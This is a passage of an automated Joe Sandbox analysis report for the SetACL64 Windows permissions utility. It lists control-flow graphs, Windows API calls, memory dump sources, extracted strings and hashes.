1735->1750 1745 7ff686842ef9-7ff686842f4f call 7ff6868541a0 call 7ff686855f60 1737->1745 1746 7ff686842f57-7ff686842f7a 1737->1746 1742 7ff68684331f-7ff6868433b7 call 7ff686833f80 * 2 call 7ff68683d260 1741->1742 1743 7ff6868431f2-7ff6868431f4 1741->1743 1823 7ff6868433b9-7ff6868433d3 1742->1823 1824 7ff6868433f4-7ff686843400 1742->1824 1743->1742 1751 7ff6868431fa-7ff686843207 1743->1751 1745->1746 1756 7ff686842f97-7ff686842fa9 1746->1756 1757 7ff686842f7c 1746->1757 1777 7ff6868434db-7ff6868434e0 call 7ff6868688fc 1750->1777 1762 7ff686843209-7ff68684320e call 7ff68687de6c 1751->1762 1763 7ff686843211-7ff68684323a call 7ff686829520 1751->1763 1759 7ff686842fb9-7ff686842fc0 1756->1759 1760 7ff686842fab-7ff686842fb2 1756->1760 1768 7ff686842f80-7ff686842f91 1757->1768 1770 7ff686842fd0-7ff686842fdf 1759->1770 1771 7ff686842fc2-7ff686842fc9 1759->1771 1760->1759 1762->1763 1789 7ff686843276-7ff686843278 1763->1789 1790 7ff68684323c-7ff686843256 1763->1790 1764->1729 1764->1735 1767->1764 1792 7ff686842f93 1768->1792 1778 7ff686842fe1-7ff686842ff1 1770->1778 1779 7ff686843054-7ff6868430f9 call 7ff686833f80 * 2 call 7ff68683d260 1770->1779 1771->1770 1806 7ff6868434e1-7ff6868434e6 call 7ff6868688fc 1777->1806 1786 7ff68684300e-7ff686843011 1778->1786 1787 7ff686842ff3-7ff68684300c call 7ff686829520 call 7ff6868496d0 1778->1787 1856 7ff686843136-7ff686843142 1779->1856 1857 7ff6868430fb-7ff686843115 1779->1857 1798 7ff68684302e-7ff686843041 call 7ff686829520 call 7ff68684bc40 1786->1798 1799 7ff686843013-7ff68684302c call 7ff686829520 call 7ff68684b710 1786->1799 1850 7ff686843043-7ff686843049 1787->1850 1801 7ff686843299-7ff6868432b1 1789->1801 1802 7ff68684327a-7ff686843289 call 7ff68685e1c0 1789->1802 1796 7ff686843258-7ff68684326b 1790->1796 1797 7ff686843271 call 7ff6868621a0 1790->1797 1792->1756 1796->1797 1809 7ff6868434e7-7ff6868434ec call 7ff6868688fc 1796->1809 1797->1789 1798->1850 1799->1850 1804 7ff6868432ce-7ff6868432d1 1801->1804 1805 7ff6868432b3-7ff6868432cc call 7ff686829520 call 7ff6868496d0 1801->1805 1802->1801 1826 7ff68684328b-7ff686843294 1802->1826 1817 7ff6868432ee-7ff686843301 call 7ff686829520 call 7ff68684e530 1804->1817 1818 7ff6868432d3-7ff6868432ec call 7ff686829520 call 7ff68684b710 1804->1818 1874 7ff686843303-7ff686843309 1805->1874 1806->1809 1841 7ff6868434ed-7ff686843502 call 7ff686864c18 1809->1841 1817->1874 1818->1874 1838 7ff6868433ee-7ff6868433f3 call 7ff6868621a0 1823->1838 1839 7ff6868433d5-7ff6868433e8 1823->1839 1828 7ff68684343d-7ff68684346b call 7ff686862180 1824->1828 1829 7ff686843402-7ff68684341c 1824->1829 1826->1841 1845 7ff686843437-7ff68684343c call 7ff6868621a0 1829->1845 1846 7ff68684341e-7ff686843431 1829->1846 1838->1824 1839->1838 1843 7ff686843503-7ff686843508 call 7ff6868688fc 1839->1843 1841->1843 1860 7ff686843509-7ff6868435d7 call 7ff6868688fc call 7ff686833f80 * 2 call 7ff68683d260 1843->1860 1845->1828 1846->1845 1846->1860 1850->1750 1854 7ff68684304f 1850->1854 1866 7ff68684317e-7ff6868431ae 1854->1866 1856->1866 1872 7ff686843144-7ff68684315e 1856->1872 1868 7ff686843117-7ff68684312a 1857->1868 1869 7ff686843130-7ff686843135 call 7ff6868621a0 1857->1869 1898 7ff6868435d9-7ff6868435f0 1860->1898 1899 7ff686843611-7ff6868436e8 1860->1899 1882 7ff6868431c8-7ff6868431e2 call 7ff6868540e0 1866->1882 1883 7ff6868431b0-7ff6868431c3 call 7ff686856010 1866->1883 1868->1777 1868->1869 1869->1856 1880 7ff686843179 call 7ff6868621a0 1872->1880 1881 7ff686843160-7ff686843173 1872->1881 1876 7ff68684330b-7ff686843310 call 7ff68687de6c 1874->1876 1877 7ff686843313-7ff686843319 1874->1877 1876->1877 1877->1742 1877->1841 1880->1866 1881->1806 1881->1880 1882->1741 1883->1882 1901 7ff68684360b-7ff686843610 call 7ff6868621a0 1898->1901 1902 7ff6868435f2-7ff686843605 1898->1902 1903 7ff6868436ea-7ff686843701 1899->1903 1904 7ff686843721-7ff6868443dc call 7ff686862180 1899->1904 1901->1899 1902->1901 1905 7ff6868443e3-7ff686844430 call 7ff6868688fc * 13 1902->1905 1909 7ff68684371c call 7ff6868621a0 1903->1909 1910 7ff686843703-7ff686843716 1903->1910 1909->1904 1910->1909 1913 7ff6868443dd-7ff6868443e2 call 7ff6868688fc 1910->1913 1913->1905
                                        APIs
                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868434DB
                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868434E1
                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868434E7
                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686843503
                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686843509
                                          • Part of subcall function 00007FF68684B710: RegEnumKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000001A1), ref: 00007FF68684B812
                                          • Part of subcall function 00007FF686829520: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686829606
                                          • Part of subcall function 00007FF686829520: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68682960C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskEnum
                                        • String ID: SetACL finished successfully.$/$Action 'reset children' was used without specifying whether to reset the DACL, SACL, or both. Nothing was reset.$Object path and/or object type not specified.$Prepare$Run$read
                                        • API String ID: 1222371136-710240214
                                        • Opcode ID: 6fd56c362ca3c0bd5d5ac0762c920353aa005472101274b7ea8be5c822556958
                                        • Instruction ID: a746cacaaaafb389c668c461b4964444e1aa38cca4b16b824fc192f3d3691853
                                        • Opcode Fuzzy Hash: 6fd56c362ca3c0bd5d5ac0762c920353aa005472101274b7ea8be5c822556958
                                        • Instruction Fuzzy Hash: D632E2A2B1D782C6EA24DB25D0853BE6365FF45780F40413AE65D876D6DFBEE840C720
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$Info$CloseErrorLastProcessSecurityShare$BufferCreateCurrentFileFreeHandleNamedOpenToken
                                        • String ID: SeSecurityPrivilege
                                        • API String ID: 4200377542-2333288578
                                        • Opcode ID: 72c4d0f1dcd23645b0fd41c2eee2edcd0e185607ca5a744b2523e201e660a9b5
                                        • Instruction ID: 35b28d8166c50361eac63c5d4dc8efe04d8e99683064944ed3fb8332635ddf5f
                                        • Opcode Fuzzy Hash: 72c4d0f1dcd23645b0fd41c2eee2edcd0e185607ca5a744b2523e201e660a9b5
                                        • Instruction Fuzzy Hash: 884262A2A18782C5EB10CF25D4587AD23A1FF44798F508139DB5E87AD9DF7EE980C360

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2981 7ff68683da7f-7ff68683dabb SetEvent ReleaseMutex call 7ff6868621a0 2985 7ff68683dac1-7ff68683e829 EnterCriticalSection CloseHandle call 7ff68683e8c0 2981->2985 2986 7ff68683d8d4-7ff68683d8df 2981->2986 3024 7ff68683e84e-7ff68683e853 call 7ff6868688fc 2985->3024 2987 7ff68683d91a-7ff68683d93e 2986->2987 2988 7ff68683d8e1-7ff68683d8fa 2986->2988 2993 7ff68683d97a-7ff68683d985 2987->2993 2994 7ff68683d940-7ff68683d959 2987->2994 2990 7ff68683d8fc-7ff68683d90f 2988->2990 2991 7ff68683d915 call 7ff6868621a0 2988->2991 2990->2991 2997 7ff68683e854-7ff68683e860 call 7ff6868688fc * 3 2990->2997 2991->2987 2995 7ff68683d987-7ff68683d9a0 2993->2995 2996 7ff68683d9c1-7ff68683d9cc 2993->2996 3000 7ff68683d95b-7ff68683d96e 2994->3000 3001 7ff68683d974-7ff68683d979 call 7ff6868621a0 2994->3001 3004 7ff68683d9bb-7ff68683d9c0 call 7ff6868621a0 2995->3004 3005 7ff68683d9a2-7ff68683d9b5 2995->3005 3007 7ff68683da07-7ff68683da40 call 7ff686862180 2996->3007 3008 7ff68683d9ce-7ff68683d9e7 2996->3008 3035 7ff68683e865-7ff68683e866 call 7ff6868688fc 2997->3035 3000->3001 3002 7ff68683e878-7ff68683e87d call 7ff6868688fc 3000->3002 3001->2993 3011 7ff68683e87e-7ff68683e888 call 7ff6868688fc 3002->3011 3004->2996 3005->3004 3005->3011 3015 7ff68683d9e9-7ff68683d9fc 3008->3015 3016 7ff68683da02 call 7ff6868621a0 3008->3016 3034 7ff68683e88a-7ff68683e88c 3011->3034 3011->3035 3015->3016 3015->3024 3016->3007 3024->2997 3037 7ff68683e869-7ff68683e877 call 7ff6868688fc call 7ff686833e30 3034->3037 3038 7ff68683e88e 3034->3038 3035->3037 3037->3002
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: CriticalEnterEventMutexReleaseSection
                                        • String ID: %s$UNKNW,
                                        • API String ID: 995701069-1666316639
                                        • Opcode ID: 003888358cd9cecbf61ced5c3771de75027d33bda59ba79a7f963fd78033388b
                                        • Instruction ID: 0410017a460c161042bf2ef77a2c7031cb725082661a18f3f957704836942e76
                                        • Opcode Fuzzy Hash: 003888358cd9cecbf61ced5c3771de75027d33bda59ba79a7f963fd78033388b
                                        • Instruction Fuzzy Hash: AF5191E2A19A86C1EA04DB25D59837D2362FF44B84F415439CA1D8B7A2DF7EEC44C320

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 3047 7ff68683d304-7ff68683d30a 3048 7ff68683d310-7ff68683d318 3047->3048 3049 7ff68683d65f-7ff68683d668 LeaveCriticalSection 3047->3049 3050 7ff68683d326-7ff68683d32e 3048->3050 3051 7ff68683d31a-7ff68683d320 3048->3051 3052 7ff68683d669-7ff68683d66d 3049->3052 3053 7ff68683d35b-7ff68683d35d 3050->3053 3054 7ff68683d330-7ff68683d355 GetSystemTimeAsFileTime 3050->3054 3051->3049 3051->3050 3055 7ff68683d6a6-7ff68683d6aa 3052->3055 3056 7ff68683d66f-7ff68683d685 3052->3056 3057 7ff68683d36f-7ff68683d371 3053->3057 3058 7ff68683d35f-7ff68683d369 GetCurrentThreadId 3053->3058 3054->3053 3061 7ff68683d6ac-7ff68683d6c2 3055->3061 3062 7ff68683d6df-7ff68683d6e7 3055->3062 3059 7ff68683d687-7ff68683d69a 3056->3059 3060 7ff68683d6a0-7ff68683d6a5 call 7ff6868621a0 3056->3060 3065 7ff68683d527-7ff68683d5b0 LeaveCriticalSection call 7ff6868621d4 3057->3065 3066 7ff68683d377-7ff68683d3a4 GetUserNameExW 3057->3066 3058->3057 3059->3060 3067 7ff68683d74e-7ff68683d753 call 7ff6868688fc 3059->3067 3060->3055 3069 7ff68683d6d9-7ff68683d6de call 7ff6868621a0 3061->3069 3070 7ff68683d6c4-7ff68683d6d7 3061->3070 3063 7ff68683d6e9-7ff68683d6ff 3062->3063 3064 7ff68683d71b-7ff68683d741 call 7ff686862180 3062->3064 3074 7ff68683d716 call 7ff6868621a0 3063->3074 3075 7ff68683d701-7ff68683d714 3063->3075 3089 7ff68683d5cc-7ff68683d5e9 3065->3089 3090 7ff68683d5b2-7ff68683d5bb 3065->3090 3077 7ff68683d3b9-7ff68683d3e4 call 7ff686835790 GetUserNameExW 3066->3077 3078 7ff68683d3a6-7ff68683d3b3 GetLastError 3066->3078 3072 7ff68683d754-7ff68683d759 call 7ff6868688fc 3067->3072 3069->3062 3070->3069 3070->3072 3074->3064 3075->3074 3099 7ff68683d3e6-7ff68683d3ee GetLastError 3077->3099 3100 7ff68683d3f0-7ff68683d3f7 3077->3100 3078->3077 3087 7ff68683d45a-7ff68683d45c 3078->3087 3087->3065 3092 7ff68683d462-7ff68683d4c9 call 7ff686830520 call 7ff68682a740 3087->3092 3096 7ff68683d5eb-7ff68683d600 call 7ff686833f80 3089->3096 3097 7ff68683d605-7ff68683d60c 3089->3097 3094 7ff68683d5bd 3090->3094 3095 7ff68683d5c1-7ff68683d5c7 call 7ff686833f80 3090->3095 3122 7ff68683d51c-7ff68683d526 call 7ff686829720 3092->3122 3123 7ff68683d4cb-7ff68683d4d2 3092->3123 3094->3095 3095->3089 3096->3097 3105 7ff68683d62b-7ff68683d62e 3097->3105 3106 7ff68683d60e-7ff68683d627 call 7ff686833f80 3097->3106 3101 7ff68683d41a-7ff68683d41d 3099->3101 3102 7ff68683d400-7ff68683d409 3100->3102 3101->3087 3109 7ff68683d41f-7ff68683d437 3101->3109 3102->3102 3108 7ff68683d40b-7ff68683d417 call 7ff686833f80 3102->3108 3111 7ff68683d64a-7ff68683d65d call 7ff68683ea60 3105->3111 3112 7ff68683d630-7ff68683d639 3105->3112 3106->3105 3108->3101 3116 7ff68683d439-7ff68683d44c 3109->3116 3117 7ff68683d452-7ff68683d455 call 7ff6868621a0 3109->3117 3111->3052 3119 7ff68683d63b 3112->3119 3120 7ff68683d63e-7ff68683d649 call 7ff686833f80 3112->3120 3116->3117 3127 7ff68683d748-7ff68683d74d call 7ff6868688fc 3116->3127 3117->3087 3119->3120 3120->3111 3122->3065 3129 7ff68683d4f7-7ff68683d502 3123->3129 3130 7ff68683d4d4-7ff68683d4dd 3123->3130 3127->3067 3129->3122 3136 7ff68683d504-7ff68683d50d 3129->3136 3134 7ff68683d4df 3130->3134 3135 7ff68683d4e2-7ff68683d4f2 call 7ff686833f80 3130->3135 3134->3135 3135->3129 3140 7ff68683d50f 3136->3140 3141 7ff68683d512-7ff68683d51b call 7ff686833f80 3136->3141 3140->3141 3141->3122
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: CriticalErrorEventLastLeaveNameSectionTimeUser$CurrentFileMutexObjectReleaseResetSingleSystemThreadWait
                                        • String ID:
                                        • API String ID: 3424761043-0
                                        • Opcode ID: 82ea7e4afd397da255eb45e089590796cd57700379ab681c382546437c843004
                                        • Instruction ID: 5a9a26cd481a4aafe4b8519b3825663fe5e4ac1cd163496f22314ffde96ce16c
                                        • Opcode Fuzzy Hash: 82ea7e4afd397da255eb45e089590796cd57700379ab681c382546437c843004
                                        • Instruction Fuzzy Hash: 93C18AA2B18B42C6EB108F64E4842AC3371FF49B98F404639DA5D977A9DF3DE944C760

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 3145 7ff68685f3c0-7ff68685f3e8 3146 7ff68685f3ea 3145->3146 3147 7ff68685f3ed-7ff68685f409 3145->3147 3146->3147 3148 7ff68685f40b 3147->3148 3149 7ff68685f40e-7ff68685f412 3147->3149 3148->3149 3150 7ff68685f419-7ff68685f41e 3149->3150 3151 7ff68685f414-7ff68685f417 3149->3151 3152 7ff68685f423-7ff68685f45c LookupAccountNameW GetLastError 3150->3152 3153 7ff68685f420 3150->3153 3151->3152 3154 7ff68685f469-7ff68685f487 3152->3154 3155 7ff68685f45e-7ff68685f464 GetLastError 3152->3155 3153->3152 3157 7ff68685f4e6-7ff68685f4fd call 7ff686835790 3154->3157 3158 7ff68685f489-7ff68685f490 3154->3158 3156 7ff68685f62f-7ff68685f646 3155->3156 3166 7ff68685f502-7ff68685f507 3157->3166 3167 7ff68685f4ff 3157->3167 3160 7ff68685f4bb-7ff68685f4c3 call 7ff6868621d4 3158->3160 3161 7ff68685f492-7ff68685f499 3158->3161 3173 7ff68685f4c6-7ff68685f4e1 call 7ff686864d90 3160->3173 3163 7ff68685f653-7ff68685f658 Concurrency::cancel_current_task 3161->3163 3164 7ff68685f49f-7ff68685f4a7 call 7ff6868621d4 3161->3164 3176 7ff68685f64d-7ff68685f652 call 7ff6868688fc 3164->3176 3177 7ff68685f4ad-7ff68685f4b9 3164->3177 3170 7ff68685f509-7ff68685f50c 3166->3170 3171 7ff68685f50e-7ff68685f513 3166->3171 3167->3166 3174 7ff68685f518-7ff68685f555 LookupAccountNameW 3170->3174 3171->3174 3175 7ff68685f515 3171->3175 3173->3157 3179 7ff68685f557-7ff68685f55f GetLastError 3174->3179 3180 7ff68685f561-7ff68685f568 3174->3180 3175->3174 3176->3163 3177->3173 3183 7ff68685f5bb-7ff68685f5be 3179->3183 3184 7ff68685f570-7ff68685f579 3180->3184 3186 7ff68685f5f9-7ff68685f5fc 3183->3186 3187 7ff68685f5c0-7ff68685f5d9 3183->3187 3184->3184 3188 7ff68685f57b-7ff68685f589 call 7ff686833f80 3184->3188 3192 7ff68685f62d 3186->3192 3193 7ff68685f5fe-7ff68685f608 3186->3193 3189 7ff68685f5db-7ff68685f5ee 3187->3189 3190 7ff68685f5f0-7ff68685f5f8 call 7ff6868621a0 3187->3190 3188->3183 3203 7ff68685f58b-7ff68685f58e 3188->3203 3189->3190 3194 7ff68685f647-7ff68685f64c call 7ff6868688fc 3189->3194 3190->3186 3192->3156 3197 7ff68685f60a-7ff68685f61d 3193->3197 3198 7ff68685f622-7ff68685f628 call 7ff6868621a0 3193->3198 3194->3176 3197->3176 3199 7ff68685f61f 3197->3199 3198->3192 3199->3198 3203->3183 3205 7ff68685f590-7ff68685f59b IsValidSid 3203->3205 3205->3183 3206 7ff68685f59d-7ff68685f5a4 3205->3206 3207 7ff68685f5a6-7ff68685f5ab call 7ff68686d6ac 3206->3207 3208 7ff68685f5af-7ff68685f5b7 call 7ff68685ec20 3206->3208 3207->3208 3208->3183
                                        APIs
                                        • LookupAccountNameW.ADVAPI32 ref: 00007FF68685F44D
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,?,FFFFFFFF,?,00000001,00007FF68685E9EF), ref: 00007FF68685F453
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,?,FFFFFFFF,?,00000001,00007FF68685E9EF), ref: 00007FF68685F45E
                                        • LookupAccountNameW.ADVAPI32 ref: 00007FF68685F54D
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,?,FFFFFFFF,?,00000001,00007FF68685E9EF), ref: 00007FF68685F557
                                        • IsValidSid.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,?,FFFFFFFF,?,00000001,00007FF68685E9EF), ref: 00007FF68685F593
                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685F647
                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685F64D
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68685F653
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: ErrorLast$AccountLookupName_invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskValid
                                        • String ID:
                                        • API String ID: 311209037-0
                                        • Opcode ID: c7e2f3c1dd69d1f4acddb5ab312ab4255335677c4fd2a3498e6ade446b79d788
                                        • Instruction ID: 7838ea96591f6919d988251c95671d1217f67598a4a12cd07ed5671115db3171
                                        • Opcode Fuzzy Hash: c7e2f3c1dd69d1f4acddb5ab312ab4255335677c4fd2a3498e6ade446b79d788
                                        • Instruction Fuzzy Hash: B371B3A2A18B82C1EA249F11A54837D72A5FF84BD4F544339DA5E87794DF3DE840C760

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 3329 7ff68683cd0a-7ff68683cd24 call 7ff68683d0a0 call 7ff686834fc0 3334 7ff68683cd26-7ff68683cd2e 3329->3334 3335 7ff68683cd94-7ff68683cd9c 3329->3335 3338 7ff68683cd66-7ff68683cd91 3334->3338 3339 7ff68683cd30-7ff68683cd46 3334->3339 3336 7ff68683cd9e-7ff68683cdb4 3335->3336 3337 7ff68683cdd4-7ff68683cdd9 3335->3337 3340 7ff68683cdb6-7ff68683cdc9 3336->3340 3341 7ff68683cdcf call 7ff6868621a0 3336->3341 3342 7ff68683cdf6-7ff68683ce19 call 7ff686829520 call 7ff68685c0b0 3337->3342 3343 7ff68683cddb-7ff68683cdf1 call 7ff686833f80 3337->3343 3338->3335 3344 7ff68683cd48-7ff68683cd5b 3339->3344 3345 7ff68683cd61 call 7ff6868621a0 3339->3345 3340->3341 3347 7ff68683d084-7ff68683d089 call 7ff6868688fc 3340->3347 3341->3337 3361 7ff68683ce89-7ff68683ce91 3342->3361 3362 7ff68683ce1b-7ff68683ce23 3342->3362 3354 7ff68683cf9c-7ff68683cfd4 RegisterEventSourceW call 7ff68686e62c 3343->3354 3344->3345 3344->3347 3345->3338 3358 7ff68683d08a-7ff68683d08f call 7ff6868688fc 3347->3358 3363 7ff68683cfd9-7ff68683cfe3 3354->3363 3371 7ff68683d090-7ff68683d095 call 7ff6868688fc 3358->3371 3367 7ff68683cec9-7ff68683ceec call 7ff686829520 call 7ff68685bf70 3361->3367 3368 7ff68683ce93-7ff68683cea9 3361->3368 3365 7ff68683ce5b-7ff68683ce86 3362->3365 3366 7ff68683ce25-7ff68683ce3b 3362->3366 3369 7ff68683cff9-7ff68683d004 3363->3369 3370 7ff68683cfe5-7ff68683cff7 call 7ff68686e1f8 call 7ff68683c3a0 3363->3370 3365->3361 3372 7ff68683ce56 call 7ff6868621a0 3366->3372 3373 7ff68683ce3d-7ff68683ce50 3366->3373 3396 7ff68683cf5c-7ff68683cf64 3367->3396 3397 7ff68683ceee-7ff68683cef6 3367->3397 3375 7ff68683ceab-7ff68683cebe 3368->3375 3376 7ff68683cec4 call 7ff6868621a0 3368->3376 3374 7ff68683d006-7ff68683d00a 3369->3374 3370->3374 3372->3365 3373->3358 3373->3372 3382 7ff68683d00c-7ff68683d022 3374->3382 3383 7ff68683d03e-7ff68683d07d LeaveCriticalSection call 7ff686862180 3374->3383 3375->3358 3375->3376 3376->3367 3388 7ff68683d039 call 7ff6868621a0 3382->3388 3389 7ff68683d024-7ff68683d037 3382->3389 3388->3383 3389->3388 3396->3354 3400 7ff68683cf66-7ff68683cf7c 3396->3400 3398 7ff68683cef8-7ff68683cf0e 3397->3398 3399 7ff68683cf2e-7ff68683cf59 3397->3399 3401 7ff68683cf29 call 7ff6868621a0 3398->3401 3402 7ff68683cf10-7ff68683cf23 3398->3402 3399->3396 3403 7ff68683cf97 call 7ff6868621a0 3400->3403 3404 7ff68683cf7e-7ff68683cf91 3400->3404 3401->3399 3402->3371 3402->3401 3403->3354 3404->3371 3404->3403
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$CriticalSection$EnterEventFileLeaveModuleNameRegisterSource
                                        • String ID: DefaultEventSource
                                        • API String ID: 352910984-1672983561
                                        • Opcode ID: 9ab4e8bb403d8240f21ffea30b4f19ad447ea429c625c95da4614829f2c2d001
                                        • Instruction ID: 2341e1106d9bb87b406ea7b9219e5e7204037fb8b3fa904901ebbdec40725e6c
                                        • Opcode Fuzzy Hash: 9ab4e8bb403d8240f21ffea30b4f19ad447ea429c625c95da4614829f2c2d001
                                        • Instruction Fuzzy Hash: 5EA17FA2A14B81C5EF008F38D5593AD2361FF5479CF408639E76C46AEADF7AE990C310

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterLeave$CloseDeregisterEventHandleSource
                                        • String ID:
                                        • API String ID: 1038480651-0
                                        • Opcode ID: 7186af4088bc47e5858a979c3040af2f97af1d69e41cea5f9ceaa15bf5e240b6
                                        • Instruction ID: 01282b4f724d8db2e810c013bc1b0ad67a049cfbad9f96916154a0a70914a905
                                        • Opcode Fuzzy Hash: 7186af4088bc47e5858a979c3040af2f97af1d69e41cea5f9ceaa15bf5e240b6
                                        • Instruction Fuzzy Hash: AD0140B1A5C546CAFA649B15B8A83386351BFC8B42F040539CA8EC62B1CF2FAC44C220

